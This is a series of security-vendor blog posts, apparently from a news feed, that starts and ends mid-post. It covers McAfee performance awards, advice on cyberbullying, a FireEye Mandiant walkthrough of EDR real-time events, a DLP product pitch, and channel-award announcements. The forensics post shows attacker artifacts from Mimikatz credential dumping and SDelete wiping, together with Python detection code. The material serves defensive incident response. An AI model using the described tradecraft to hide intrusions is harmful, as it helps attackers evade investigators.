With ‘Total Protection’, McAfee succeeded at fielding a top product in 2019 which was able to meet the high standards of the AV-TEST Institute. In the consumer field, McAfee receives recognition for best performance and is thus given the Best Performance 2019 Award by the AV-TEST Institute. 

“With ‘Total Protection’, McAfee proves that good malware defense does not have to sacrifice system performance,” says Andreas Marx, CEO of AV-TEST. “Hardly any other software was able to achieve such stellar results in the category of performance in the annual test, which is why McAfee receives the Performance Award for consumer software.”

The announcement of the award can be seen on the AV-TEST website here.

AV-Comparatives

Every year in April and October AV-Comparatives publishes its Performance Test Report. For this report the lab looks at 17 security products, including McAfee Total Protection, and evaluates how much impact each has on PC performance.

The test lab uses low-end computers as these are most widely used and more at risk of suffering from resource consumption and thus performance impact. The tests also mimic daily usage as much as possible and focus on activities such as copying files, installing and uninstalling applications, launching applications, downloading files and browsing websites.

Based on the results of these tests, the products are evaluated and graded in award levels ranging from ADVANCED+ (the highest) to STANDARD (the lowest).

McAfee has achieved the ADVANCED+ ranking continuously since October 2016:

AV-Comparatives Performance Impact Scores

As a result, McAfee received the Silver Award in the category ‘Overall Performance (Low System-Impact)’ in February 2020 for demonstrating a lower impact on system performance than other products throughout 2019.

And in 2020 we are off to a good start again!

On May 8th AV-Comparatives published its April 2020 Performance Test Report, and McAfee Total Protection was again awarded the highest possible rating: ADVANCED+.

With this result McAfee continues to show less impact on PC performance than most other security products and is one of the lightest security products on the market.

Summary

Even though good malware protection is continuously monitoring all activity on your PC and laptop for cyber threats, this doesn’t have to mean that it also slows down the performance of your devices.

As we have seen in the results from two of the world's most reputable anti-malware test labs, AV-TEST and AV-Comparatives, McAfee Total Protection has achieved stellar results in performance tests since October 2016, and in 2019 both labs recognised that with performance awards.

And with an excellent start in the 2020 test reports we believe that it is fair to say that good malware protection doesn’t need to slow you down and McAfee Total Protection is one of the lightest security products currently available.

 

 


Is Your Child Being Cyberbullied? What Parents Need to Know


In this season of social distancing, teens need their friends more than ever. Daily digital connection — through texting, video chat, social networks, and gaming — is critical to keeping friend groups strong. But could increased time online these days lead to an increase in cyberbullying?

While there isn’t data to answer that question definitively, it wouldn’t be surprising for parents to notice some signs of conflict surface as the months continue to creep by. And, with re-open dates for schools in limbo, it’s more important than ever to keep the family safety conversation humming.

For clarity: Allowing more screen time doesn’t mean more cyberbullying or conflict is certain to occur. However, experience has taught us that more screen time does increase the potential for digital conflict.

Social and Emotional Fallout

This unprecedented health event hasn’t been easy on anyone, but kids especially are likely to be holding onto some big emotions about it. A recent Common Sense Media study confirms that social media has been key to helping kids get through this crisis, but one in four kids surveyed feels “more lonely than usual.”

The school year with its milestones — proms, graduations, dates, parties — ended abruptly. It’s logical to assume these losses have sparked feelings of sadness, anger, frustration, and anxiety. And because online is where most kids connect with peers, these emotions can easily play out there in the form of aggressive behavior, conflict, or persistent drama.

Digital Awareness


So how do you know if your child is being cyberbullied or dealing with conflict online? It isn't always easy, simply because so many kids won't admit to being bullied. Often they believe telling an adult will make the harassment worse. They may feel ashamed or embarrassed about a regrettable situation, or about the fact that they're being targeted in the first place. For that reason, one of the best ways to help your child is to be aware of the time they spend online, the people they connect with, and how those digital circles affect their wellbeing.

What to Look For

The many forms of cyberbullying continue to evolve alongside the digital culture. Here are just a few ways kids bully one another.

 

  • Saying hurtful or intimidating things to someone on social media, a text, or email.
  • Making negative comments about a person’s sexuality, race, religion, handicaps, or physical features.
  • Camouflaging hurtful or threatening comments with words like “jk” (just joking).
  • Asking online friends to vote for or against another person, with Instagram polls or captions such as “Is this person hot or not?” or “Would you go out with this person?”
  • Posting or sharing with others the private photos, memes, emails, texts, or secrets without the permission of another person.
  • Intentionally posting unflattering or embarrassing photos of another person.
  • Spreading rumors or false information about another person online.
  • Making any threat to another person no matter how harmless you think it may be.

Signs of Cyberbullying

If your child is getting bullied online, there are some potential signs.

  • Anxious or upset after reading a text, frequently gets sick or nauseous, declines invitations from friends, or bows out of fun family outings.
  • Trouble sleeping or being withdrawn or moody.
  • Being protective of his or her phone, deleting or deactivating social networks
  • Sudden loss of a steady friend group or sudden complaining about once-loved friends.
  • Loss of interest in favorite sports or hobbies or a decline in grades.
  • References to suicide, loneliness, and hopelessness (when severe bullying is taking place).

Know Where They Go

Another way to understand your child's emotional connection to his or her digital communities is to learn about their favorite platforms and monitor them. Pay specific attention to the tone of his or her social threads, and if you see concerning comments or posts, ask your child how you can help. If your child is using risky apps such as WhatsApp or Kik that let people interact anonymously, discuss your concerns with your child. Some social networks are more conducive to cyberbullying than others.

Monitor Gaming Communities

Gaming time can skyrocket during the summer, and when games get competitive, cyberbullying can happen. Spend time with your child while he or she is gaming. Listen to the tone of the conversations and be aware of your child’s demeanor. For your child’s physical and emotional health, make every effort to set gaming limits as summer approaches.

Parenting Moves to Avoid

Bullying experts will tell you that what you don’t do if your child is getting bullied is often as important as what you do. Here’s some insight:

1) Never advise a child to ignore the bullying.
2) Never blame a child for being bullied, even if he or she did something to aggravate the bullying. No one deserves to be bullied.
3) As angry as you feel that someone is bullying your child, do not encourage your child to fight back physically.
4) Don't overreact; escalate accordingly. If you can identify the bully, consider talking with the child's parents.
5) Don't lead the charge. Give your child veto power over your involvement. If they say they don't want you to get involved (unless you suspect physical danger or suicide), respect that.
6) If the bullying continues to escalate, report it, and seek help from school counselors or the police if necessary.
7) Even if you are fearful, don't take your child's digital devices away. He or she didn't do anything wrong.

Online Resources

A number of organizations are leading the charge against cyberbullying and have fantastic resources for families. Here are just a few: Cyberbullying Research Center, StopBullying.gov, StompOutBullying.org, KindCampaign.com, ItGetsBetter.org, and the National Bullying Prevention Center. If you'd like your organization added to this list, please leave a comment.

We hope you and your family are staying healthy these days and finding some time to talk about online safety. If you need a refresher, read Part I and Part II of our Online Safety Basics series. And, if you’re looking for a fun school lesson for the day, you can always quiz your kids on any of McAfee’s Family Safety content!


Using Real-Time Events in Investigations

To understand what a threat actor did on a Windows system, analysts often turn to the tried and true sources of historical endpoint artifacts such as the Master File Table (MFT), registry hives, and Application Compatibility Cache (AppCompat). However, these evidence sources were not designed with detection or incident response in mind; crucial details may be omitted or cleared through anti-forensic methods. By looking at historical evidence alone, an analyst may not see the full story.

Real-time events can be thought of as forensic artifacts designed specifically for detection and incident response, produced by Endpoint Detection and Response (EDR) solutions or enhanced logging such as Sysmon. During active-attacker endpoint investigations, FireEye Mandiant has found real-time events useful for filling in the gaps in what an attacker did. These events record different types of system activity such as process execution, file writes, network connections, and more.

During incident response engagements, Mandiant uses FireEye Endpoint Security to track endpoint system events in real-time. This feature allows investigators to track an attacker on any system by alerting on and reviewing these real-time events. An analyst can use our solution’s built-in Audit Viewer or Redline to review real-time events.

Let’s look at some examples of Windows real-time events available on our solution and how they can be leveraged during an investigation. Let’s assume the account TEST-DOMAIN\BackupAdmin was an inactive Administrator account compromised by an attacker. Please note the examples provided in this post are based on real-time events observed during engagements but have been recreated or altered to preserve client confidentiality.

Process Execution Events

There are many historical process execution artifacts including AppCompat, AmCache, WMI CCM_RecentlyUsedApps, and more. A single artifact rarely covers all the useful details relating to a process's execution, but real-time process execution events change that. Our solution’s real-time process execution events record execution time, full process path, process identification number (PID), parent process path, parent PID, user, command line arguments, and even the process MD5 hash.

Table 1 provides an example of a real-time process execution event recorded by our solution.

Field                  Example
Timestamp (UTC)        2020-03-10 16:40:58.235
Sequence Number        2879512
PID                    9392
Process Path           C:\Windows\Temp\legitservice.exe
Username               TEST-DOMAIN\BackupAdmin
Parent PID             9103
Parent Process Path    C:\Windows\System32\cmd.exe
EventType              Start
ProcessCmdLine         "C:\Windows\Temp\legitservice.exe"  -b -m
Process MD5 Hash       a823bc31395539816e8e4664e884550f

Table 1: Example real-time process execution event

Based on this real-time process execution event, the process C:\Windows\System32\cmd.exe with PID 9103 executed the file C:\Windows\Temp\legitservice.exe with PID 9392 and the MD5 hash a823bc31395539816e8e4664e884550f. This new process used the command line arguments -b -m under the user context of TEST-DOMAIN\BackupAdmin.

We can compare this real-time event with what an analyst might see in other process execution artifacts. Table 2 provides an example AppCompat entry for the same executed process. Note the recorded timestamp is for the last modified time of the file, not the process start time.

Field                      Example
File Last Modified (UTC)   2020-03-07 23:48:09
File Path                  C:\Windows\Temp\legitservice.exe
Executed Flag              TRUE

Table 2: Example AppCompat entry

Table 3 provides an example AmCache entry. Note the last modified time of the registry key can usually be used to approximate the process start time, and this artifact records the SHA1 hash of the file rather than an MD5.

Field                              Example
Registry Key Last Modified (UTC)   2020-03-10 16:40:58
File Path                          C:\Windows\Temp\legitservice.exe
File SHA1 Hash                     2b2e04ab822ef34969b7d04642bae47385be425c

Table 3: Example AmCache entry

Table 4 provides an example Windows Event Log process creation event (Security log, EID 4688). Note this artifact records PIDs in hexadecimal notation (0x24b0 is 9392 and 0x238f is 9103, matching Table 1), includes details about the parent process, and even has a field for the process command line. In this example the command line is empty because Windows does not log it by default; it has to be switched on with the 'Include command line in process creation events' policy under Audit Process Creation, and Mandiant rarely sees this enabled by clients on investigations.

Field              Example
Write Time (UTC)   2020-03-10 16:40:58
Log                Security
Source             Microsoft Windows security
EID                4688
Message            (full text below)

A new process has been created.

Creator Subject:
      Security ID:             TEST-DOMAIN\BackupAdmin
      Account Name:            BackupAdmin
      Account Domain:          TEST-DOMAIN
      Logon ID:                0x6D6AD

Target Subject:
      Security ID:             NULL SID
      Account Name:            -
      Account Domain:          -
      Logon ID:                0x0

Process Information:
      New Process ID:          0x24b0
      New Process Name:        C:\Windows\Temp\legitservice.exe
      Token Elevation Type:    %%1938
      Mandatory Label:         Mandatory Label\Medium Mandatory Level
      Creator Process ID:      0x238f
      Creator Process Name:    C:\Windows\System32\cmd.exe
      Process Command Line:    

Table 4: Example Windows event log process creation event

If we combine the evidence available in AmCache with a fully detailed Windows Event Log process creation event, we could match the evidence available in the real-time event except for a small difference in file hash types.
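As an added example (this is not code from the original post), the following Python correlates a 4688 event with the EDR process event from Table 1. It assumes the 4688 message body is available as a string and the EDR record as a dict; the sample values are copied from Tables 1 and 4 and the message follows the standard Security log layout. The hex PIDs are converted to integers before comparison, and an empty command line is reported as a gap the EDR record fills.

```python
"""Correlate a Windows Security 4688 process-creation event with an EDR
real-time process event. 4688 stores PIDs as hex strings ("0x24b0"), the EDR
record stores them as decimal integers (9392), so they must be normalised
before they can be matched. Added example, not FireEye code."""
import re

# Constructed sample: the 4688 message body from Table 4 (Target Subject omitted).
SAMPLE_4688 = r"""A new process has been created.

Creator Subject:
      Security ID:             TEST-DOMAIN\BackupAdmin
      Account Name:            BackupAdmin
      Account Domain:          TEST-DOMAIN
      Logon ID:                0x6D6AD

Process Information:
      New Process ID:          0x24b0
      New Process Name:        C:\Windows\Temp\legitservice.exe
      Token Elevation Type:    %%1938
      Mandatory Label:         Mandatory Label\Medium Mandatory Level
      Creator Process ID:      0x238f
      Creator Process Name:    C:\Windows\System32\cmd.exe
      Process Command Line:
"""

# Constructed sample: the EDR process-start event from Table 1.
SAMPLE_EDR = {
    "pid": 9392,
    "process_path": r"C:\Windows\Temp\legitservice.exe",
    "parent_pid": 9103,
    "parent_process_path": r"C:\Windows\System32\cmd.exe",
    "user": r"TEST-DOMAIN\BackupAdmin",
    "cmdline": r'"C:\Windows\Temp\legitservice.exe"  -b -m',
}


def _field(message, name):
    """Value of the first 'Name: value' line in the message, or None if absent."""
    m = re.search(r"^\s*" + re.escape(name) + r":[ \t]*(.*?)[ \t]*$", message, re.M)
    return m.group(1) if m else None


def _pid(text):
    """'0x24b0' -> 9392; None stays None."""
    return int(text, 16) if text else None


def parse_4688(message):
    """Pull the process fields out of a 4688 message with PIDs as integers.
    'Security ID' is taken from its first occurrence, the Creator Subject."""
    return {
        "pid": _pid(_field(message, "New Process ID")),
        "process_path": _field(message, "New Process Name"),
        "parent_pid": _pid(_field(message, "Creator Process ID")),
        "parent_process_path": _field(message, "Creator Process Name"),
        "user": _field(message, "Security ID"),
        "cmdline": _field(message, "Process Command Line"),
    }


def _norm(value):
    """Case-insensitive comparison for paths and account names."""
    return value.lower() if isinstance(value, str) else value


def correlate(evt, edr):
    """Compare the 4688 record with the EDR record.
    Returns (matched, mismatched_fields, notes); notes lists what the EDR
    record adds that the event log lacks."""
    keys = ("pid", "parent_pid", "process_path", "parent_process_path", "user")
    mismatches = [k for k in keys if _norm(evt.get(k)) != _norm(edr.get(k))]
    notes = []
    if not evt["cmdline"]:
        notes.append("4688 has no command line (ProcessCreationIncludeCmdLine_Enabled "
                     "is off); EDR recorded: " + edr["cmdline"])
    return not mismatches, mismatches, notes


if __name__ == "__main__":
    print(correlate(parse_4688(SAMPLE_4688), SAMPLE_EDR))
```

On a real system the same correlation is the quickest check that the EDR agent and the Security log agree on which process tree an action belongs to; a PID that matches but a parent path that does not is worth a second look, since PIDs are reused.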

File Write Events

An attacker may choose to modify or delete important evidence. If an attacker uses a file shredding tool like Sysinternals' SDelete, the analyst is unlikely to recover the original contents of the file. Our solution's real-time file write events are incredibly useful in situations like this because they record the MD5 hash of the file written and part of its contents. File write events also record which process created or modified the file in question.

Table 5 provides an example of a real-time file write event recorded by our solution.

Field                                  Example
Timestamp (UTC)                        2020-03-10 16:42:59.956
Sequence Number                        2884312
PID                                    9392
Process Path                           C:\Windows\Temp\legitservice.exe
Username                               TEST-DOMAIN\BackupAdmin
Device Path                            \Device\HarddiskVolume2
File Path                              C:\Windows\Temp\WindowsServiceNT.log
File MD5 Hash                          30a82a8a864b6407baf9955822ded8f9
Num Bytes Seen Written                 8
Size                                   658
Writes                                 4
Event Reason                           File closed
Closed                                 TRUE
Base64 Encoded Data At Lowest Offset   Q3JlYXRpbmcgJ1dpbmRvd3NTZXJ2aWNlTlQubG9nJyBsb2dmaWxlIDogT0sNCm1pbWlrYXR6KGNvbW1hbmQ
Text At Lowest Offset                  Creating 'WindowsServiceNT.log' logfile : OK....mimikatz(command

Table 5: Example real-time file write event

Based on this real-time file write event, the malicious executable C:\Windows\Temp\legitservice.exe wrote the file C:\Windows\Temp\WindowsServiceNT.log to disk with the MD5 hash 30a82a8a864b6407baf9955822ded8f9. Since the real-time event recorded the beginning of the written file, we can determine the file likely contained Mimikatz credential harvester output, which Mandiant has commonly observed to start with OK....mimikatz.

If we investigate a little later, we’ll see a process creation event for C:\Windows\Temp\taskassist.exe with the MD5 file hash 2b5cb081721b8ba454713119be062491 followed by several file write events for this process summarized in Table 6.

Timestamp                 File Path                               File Size
2020-03-10 16:53:42.351   C:\Windows\Temp\WindowsServiceNT.log    638
2020-03-10 16:53:42.351   C:\Windows\Temp\AAAAAAAAAAAAAAAA.AAA    638
2020-03-10 16:53:42.351   C:\Windows\Temp\BBBBBBBBBBBBBBBB.BBB    638
2020-03-10 16:53:42.351   C:\Windows\Temp\CCCCCCCCCCCCCCCC.CCC    638
...
2020-03-10 16:53:42.382   C:\Windows\Temp\XXXXXXXXXXXXXXXX.XXX    638
2020-03-10 16:53:42.382   C:\Windows\Temp\YYYYYYYYYYYYYYYY.YYY    638
2020-03-10 16:53:42.382   C:\Windows\Temp\ZZZZZZZZZZZZZZZZ.ZZZ    638

Table 6: Example timeline of SDelete File write events

Admittedly, this activity may seem strange at first glance. If we do some research on its file hash, we'll see the process is actually SDelete masquerading as C:\Windows\Temp\taskassist.exe. As part of its secure deletion process, SDelete renames the file 26 times in successive alphabetic order (A through Z) before deleting it, so that the original name is overwritten in the directory entry as well as the contents on disk.
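The rename burst is distinctive enough to detect automatically. The following Python is an added example (not FireEye code) that scans real-time file write events per process for SDelete's 16-character A through Z rename pattern, reports which normally named file of the same size was written immediately before the burst (the file being wiped), and flags a burst that does not reach Z, for instance because collection started late, as incomplete. The events are constructed here to mirror Table 6; the PID 9410 for taskassist.exe and the unrelated write from PID 9392 are hypothetical.

```python
"""Spot SDelete's rename burst in real-time file write events.

SDelete overwrites the file's contents and then renames it 26 times, to
AAAAAAAAAAAAAAAA.AAA through ZZZZZZZZZZZZZZZZ.ZZZ, before deleting it. In an
EDR feed this shows up as a run of same-size writes from one process to those
names, immediately after a write to the file being wiped.
Added example, not FireEye code."""
import re
import string
from collections import defaultdict

# 16 copies of one capital letter, a dot, 3 more copies; any directory prefix.
RENAME_RE = re.compile(r"^(?:.*\\)?([A-Z])\1{15}\.\1{3}$")


def find_sdelete_wipes(events):
    """events: dicts with pid, ts (sortable), path, size.
    Returns one finding per rename burst: pid, wiped_path, size, letters, complete."""
    by_pid = defaultdict(list)
    for e in events:
        by_pid[e["pid"]].append(e)

    findings = []
    for pid, evs in by_pid.items():
        evs.sort(key=lambda e: e["ts"])
        prev_write = None   # last write to a normally named file
        burst = None        # rename run currently being tracked
        for e in evs + [None]:          # None closes a trailing burst
            m = RENAME_RE.match(e["path"]) if e else None
            if m:
                if burst is None:
                    # The wiped file is the same-size write just before the burst.
                    wiped = (prev_write["path"]
                             if prev_write and prev_write["size"] == e["size"] else None)
                    burst = {"pid": pid, "wiped_path": wiped,
                             "size": e["size"], "letters": set()}
                if e["size"] == burst["size"]:
                    burst["letters"].add(m.group(1))
                continue
            if burst is not None:
                letters = "".join(sorted(burst["letters"]))
                burst["letters"] = letters
                burst["complete"] = letters == string.ascii_uppercase
                findings.append(burst)
                burst = None
            if e is not None:
                prev_write = e
    return findings


def build_sample_events():
    """Constructed sample modelled on Table 6 (not real telemetry): a process
    with hypothetical PID 9410 writes WindowsServiceNT.log, then the A..Z
    renames; an unrelated write from PID 9392 is interleaved."""
    base = "C:\\Windows\\Temp\\"
    events = [{"pid": 9410, "ts": "2020-03-10 16:53:42.351",
               "path": base + "WindowsServiceNT.log", "size": 638}]
    for i, c in enumerate(string.ascii_uppercase):
        events.append({"pid": 9410, "ts": f"2020-03-10 16:53:42.{351 + i:03d}",
                       "path": base + c * 16 + "." + c * 3, "size": 638})
    events.append({"pid": 9392, "ts": "2020-03-10 16:53:42.360",
                   "path": base + "other.tmp", "size": 12})
    return events


if __name__ == "__main__":
    for finding in find_sdelete_wipes(build_sample_events()):
        print(finding)
```

Grouping by PID before sorting matters: the renames of two files wiped by two processes at the same moment would otherwise interleave and look like one malformed burst.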

Network Events

Incident responders rarely see evidence of network communication from historical evidence on an endpoint without enhanced logging. Usually, Mandiant relies on NetFlow data, network sensors with full or partial packet capture, or malware analysis to determine the command and control (C2) servers with which a malware sample can communicate. Our solution’s real-time network events record both local and remote network ports, the leveraged protocol, and the relevant process.

Table 7 provides an example of a real-time IPv4 network event recorded by our solution.

Field               Example
Timestamp (UTC)     2020-03-10 16:46:51.690
Sequence Number     2895588
PID                 9392
Process + Path      C:\Windows\Temp\legitservice.exe
Username            TEST-DOMAIN\BackupAdmin
Local IP Address    10.0.0.52
Local Port          57472
Remote IP Address   10.0.0.51
Remote Port         443
Protocol            TCP

Table 7: Example real-time network connection event

Based on this real-time IPv4 network event, the malicious executable C:\Windows\Temp\legitservice.exe made an outbound TCP connection to 10.0.0.51:443.

Registry Key Events

Historical evidence, examined around the relevant timeframes and in commonly abused locations such as the Services keys, can identify registry keys an attacker created or modified, but not which process did it. Real-time registry key events link the modifying process to the key, and they also capture deletions and renames, which leave no trace in the hive afterwards. This matters because the only timestamp the registry keeps is a key's last write time: it is updated by any value change in that key and by the creation or deletion of a direct subkey, so on its own it cannot say which value changed, and it is gone once the key is deleted.

Table 8 provides an example of a real-time registry key event recorded by our solution.

Field                  Example
Timestamp (UTC)        2020-03-10 16:46:56.409
Sequence Number        2898196
PID                    9392
Process + Path         C:\Windows\Temp\legitservice.exe
Username               TEST-DOMAIN\BackupAdmin
Event Type             3
Path                   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LegitWindowsService\ImagePath
Key Path               CurrentControlSet\Services\LegitWindowsService
Original Path          HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\LegitWindowsService
Value Name             ImagePath
Value Type             REG_EXPAND_SZ
Base64 Encoded Value   QwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABsAGUAZwBpAHQAcwBlAHIAdgBpAGMAZQAuAGUAeABlAAAAAA==
Text                   C:\Windows\Temp\legitservice.exe

Table 8: Example real-time registry key event

For our solution's real-time registry events, we can map the event type to the operation performed using Table 9.

Event Type Value   Operation
1                  PreSetValueKey
2                  PreDeleteValueKey
3                  PostCreateKey, PostCreateKeyEx, PreCreateKeyEx
4                  PreDeleteKey
5                  PreRenameKey

Table 9: FireEye Endpoint Security real-time registry key event types

Based on this real-time registry key event, the malicious executable C:\Windows\Temp\legitservice.exe created the Windows service LegitWindowsService. If we investigated the surrounding registry keys, we might identify even more information about this malicious service.

Conclusion

The availability of real-time events designed for forensic analysis can fill in gaps that traditional forensic artifacts cannot on their own. Mandiant has seen great value in using real-time events during active-attacker investigations. We have used real-time events to determine the functionality of attacker utilities that were no longer present on disk, to determine users and source network addresses used during malicious remote desktop activity when expected corresponding event logs were missing, and more.

Check out our FireEye Endpoint Security page and Redline page for more information (as well as Redline on the FireEye Market), and take a FireEye Endpoint Security tour today.

How to Secure Your Data Everywhere? It’s Easy With Unified Cloud Edge

The need to protect sensitive data has two main drivers: privacy legislation, and protection of intellectual property against external breaches and insider threats. 58% of countries worldwide now have privacy legislation in place, and these laws will become more onerous over time. Breaches and insider theft of data are frequently reported in the media thanks to the steady stream of brand-impacting, high-profile cases. Breaches are expensive because of fines, loss of revenue and remediation costs.

Historically, data protection via DLP was implemented on the endpoint and in the business's network. Both approaches have strengths and weaknesses: network DLP cannot see sensitive data moving to USB memory sticks, and endpoint DLP does not offer some of the more sophisticated DLP capabilities that need a lot of memory and compute power. Many customers therefore deployed both enterprise DLP solutions.

Other vendors without enterprise DLP offerings have added “DLP-lite” capabilities to their products, predominantly email and web security products and some businesses have chosen those over enterprise DLP solutions.

This approach was sustainable before widespread adoption of the cloud.  95% of companies have or are adopting cloud services and 79% of them admit to storing sensitive data there.  Data is now everywhere, on laptops, servers, in sanctioned apps, in unsanctioned Shadow IT apps and moving from cloud to cloud.  Protecting data within the four walls of an organization is no longer sufficient.

Businesses, particularly those with a Cloud First strategy have responded to this challenge by introducing a CASB solution such as McAfee’s MVISION Cloud product.  Dependent on the product this can address some, or all, of these cloud adoption challenges – MVISION Cloud addresses them all.

The problem, however, is that some businesses are living with gaps in their protection because they do not deploy multiple products. Endpoint DLP cannot solve for the cloud, cloud DLP cannot solve for the endpoint, and web DLP cannot effectively solve for sanctioned apps that allow online collaboration, or for the endpoint. Looking at common use cases alongside the potential DLP leak vectors shows why a single product is not a complete solution.

To address this, businesses deploy multiple products. Doing so closes the gaps but has downsides. Multiple products are expensive to license and bring higher IT management overhead and complexity because of subtle differences in implementation. Those differences, in DLP policies, data classifications and content extraction engines, make it difficult to ensure consistent detection across products: data classifications that have been fine-tuned over time must be re-implemented from scratch for each additional product, which reduces efficacy.

McAfee’s Unified Cloud Edge (UCE) solution solves these problems.  UCE is a combination of endpoint DLP, web SaaS proxy and CASB, covering all the potential data leak vectors: endpoint, unsanctioned shadow IT apps, sanctioned apps (including email) and cloud to cloud transfers.  UCE is managed via a single console and uses the same DLP technology everywhere, such as policy and content extraction engines to maximize efficacy through consistent results.  Businesses can retain their investment in those carefully crafted data classifications, allowing use across all vectors and easy extension to the cloud.  UCE is a cloud native, highly scalable solution with industry leading uptime and availability.

Want to find out more? Listen to the webinar.

The post How to Secure Your Data Everywhere? It’s Easy With Unified Cloud Edge appeared first on McAfee Blogs.

NICE Webinar: The Continuity of Learning and Skills Development in Virtual Environments

The PowerPoint slides used during this webinar can be downloaded here.

Speakers: James R. Stellar, Professor of Behavioral Neuroscience, Department of Psychology, University at Albany, SUNY; David Lasater, Senior Director in Human Resources, Akamai Technologies

Synopsis: One of the NICE Strategic Plan values is to Challenge Assumptions: Examine the rationale for past and present education, training, and workforce approaches and apply critical analysis to future solutions. Many organizations are rethinking past practices and seeking to "stimulate innovation" (another NICE value) as they transition

Veracode’s Leslie Bois, Robin Montague, and Lisa Quinby Earn Recognition on CRN 2020 Women of the Channel List

Leslie Bois, Veracode's Vice President of Global Channels and Alliances, Robin Montague, Veracode's National Partner Director, and Lisa Quinby, Veracode's Director of Global Field and Channel Marketing, have been recognized on the esteemed CRN 2020 Women of the Channel list. The annual list recognizes a select group of high-achieving women for their contributions to channel advocacy, growth, thought leadership, and dedication to the IT channel.

Leslie Bois is responsible for global indirect channel sales growth. She develops and executes Veracode's global strategy to build a strong partner network that plays a significant role in the company's go-to-market efforts. Bois works cross-functionally to align all aspects of the business to support channel partners to grow their businesses with Veracode's leading application security solutions. A 15-year channel veteran in the software and IT industry, Leslie built her career developing highly successful partner organizations by building world-class channel teams, partner programs, and partner enablement.

This year, Bois led the transition to our channel-first initiative, which has helped us better enable partners to bring the Veracode platform to market. Driving new business through our partners has created new opportunities in markets in North America, Europe, the Middle East, Asia Pacific, and Latin America.

Aside from being selected for the CRN 2020 Women of the Channel list, Leslie Bois has also been named to CRN's Most Powerful Women of the Channel 2020: Power 100 list. The Power 100 list is comprised of standout individuals selected from the annual CRN Women of the Channel list.

"I'm honored to be recognized on the CRN 2020 Women of the Channel list and Power 100 list," said Bois. "I am confident we are the best application security provider in the world for channel partners to align with, and our SaaS-based platform means our partners have the ability to immediately get started with helping their customers address software security."

Robin Montague is responsible for collaborating with our largest national partner to set and execute a joint strategy to drive incremental revenue. This involves coordinating efforts between our channel, partner, executive, sales, marketing, legal, finance, practice areas, and technical teams to cross-educate and build strong relationships.

Over the past year, Montague launched "Software Assurance," an offering that helps our customers eliminate risk and remove roadblocks to faster innovation and larger revenues. As the offering was developed, she collaborated with Veracode leaders and departments to not only advance Veracode's award-winning application security solutions but to marry them with the strength of our partner's world-class AppSec expertise and to expand our footprint in the market. The result was a much stronger awareness within Veracode of the value that a Channel partner can bring to our sales and innovation environment.

"It's a wonderful honor to be recognized on the CRN 2020 Women of the Channel list for the third year in a row," said Montague. "Increasing Channel utilization through the development of innovative partner services is key for me."

Lisa Quinby is in charge of driving Veracode's global partner marketing strategy, programs and communications. She works closely with Veracode's entire ecosystem of partners to implement marketing plans, drive demand generation programs, and manage and oversee their participation in the Veracode Partner Program.

This year, Quinby supported the growth of our channel business by refining the onboarding process, developing our channel sales and marketing toolkits, and developing relationships with partners in EMEA, LATAM, and APJ. Under Quinby's leadership, we've seen more engagement from our partners across the globe, including a continued increase in opportunities brought forward by partners.

Quinby has also been named to CRN's The 100 People You Don't Know But Should list and received her certification as an IPED Channel Master.

"I am thrilled to once again be recognized on the CRN Women of the Channel list," said Quinby. "Driving increased marketing engagement with our partners, delivering innovative co-marketing programs, and supporting partner enablement is top of mind for me in the year ahead."

This prestigious list honors channel leaders who are paving the way for future generations with their innovative ideas and achievements. These women come from all areas of the IT ecosystem and are dedicated to the partner community.

"CRN's 2020 Women of the Channel list recognizes an accomplished group of influential women leaders whose strategic vision and unique achievements accelerate channel growth through cultivated partnerships, innovative thought leadership, and unwavering dedication to the IT channel," said Bob Skelley, CEO of The Channel Company. "We are proud to honor them for their accomplishments and contributions to driving channel success."

The full list of CRN 2020 Women of the Channel can be found on www.CRN.com/WOTC.

Visit here to find out more about partnering with Veracode.


McAfee Recognized on CRN’s 2020 Women of the Channel

Every year CRN recognizes the women who are leading the channel and their unique strengths, vision, and achievements. This prestigious, annual list acknowledges channel leaders who are blazing a trail for future generations. These women are from all areas of the IT ecosystem, including technology vendors, distributors, solution providers, and other IT organizations.

This year, we’re proud to recognize the six outstanding individuals who have been selected by CRN to be part of the 2020 Women of the Channel (WOTC) list. Each is recognized for her outstanding leadership, vision and unique role in driving channel growth and innovation.

If that weren’t exciting enough, we’re thrilled to share that Chari Rhoades received the honor of being named to CRN’s WOTC Power 100 List. The Power 100 List is a subset of the 900+ women recognized and highlights the women who are leading their organization from a variety of backgrounds and experiences. See below to learn more about each McAfee honoree.

Chari Rhoades – Director, Channel Operations and Distribution – Americas

Chari Rhoades joined McAfee in 2013 and currently leads two teams. One team focuses on the growth and development of our distribution partners. The second team is responsible for the enablement and communications to the Americas’ partners. In 2019, Chari led her distribution team to focus on executing the plan to ensure new business growth via targeted campaigns, enablement activities and leveraging key distribution services resulting in a material contribution to bookings for the channel. Chari contributed to the development and launch of the McAfee Channel Promise that defines who the channel is to McAfee and its internal teams while articulating the value of the channel. She also led the development of an internal training to ensure McAfee’s own sellers understand the channel and how to engage the channel for mutual success.

Kristin Carnes – Director, Global Channel Programs and Operations

Kristin Carnes joined McAfee through the acquisition of Skyhigh Networks. As Director of Global Channel Programs and Operations she supports a robust partner community that represents sales for more than 90% of the McAfee Enterprise business. In 2019, she accelerated McAfee’s investment in the PRM platform which gives partners a more comprehensive, simple view of their business with McAfee. In addition, she launched a new rebate program that provides predictability and greater earning potential for partners.

Gabriela Ferado – Manager, Channel Sales

Gabriela Ferado has been with McAfee for eight years. She started as a sales rep with the Latin America team before joining the Channel team, where she has learned, grown, and found a passion for helping partners be a multiplying force for the company. As a former teacher, sharing knowledge and enabling others is an integral part of what she does and thrives on. In 2019, as part of the Cloud Service Provider team, she extended McAfee's channel efforts to Latin America, which helped our teams understand the CSPs as another route to market.

Judy Kent – Director, Global Channel Programs and Communications

Judy Kent joined McAfee through the acquisition of Skyhigh Networks bringing more than 25 years of channel marketing and sales experience. In her role leading the global partner incentive programs she has driven new business revenue through the channel and has trained thousands of partners in a pre-sales technical enablement global webinar series. In addition, in January 2020, she successfully launched a new 13 language McAfee Partner Portal. She was previously recognized on CRN’s list of Women in the Channel in 2015 and 2016, and was recognized on CRN’s list of Channel Chiefs in 2016 and 2018.

Sheri Leach – Senior Distribution Account Manager

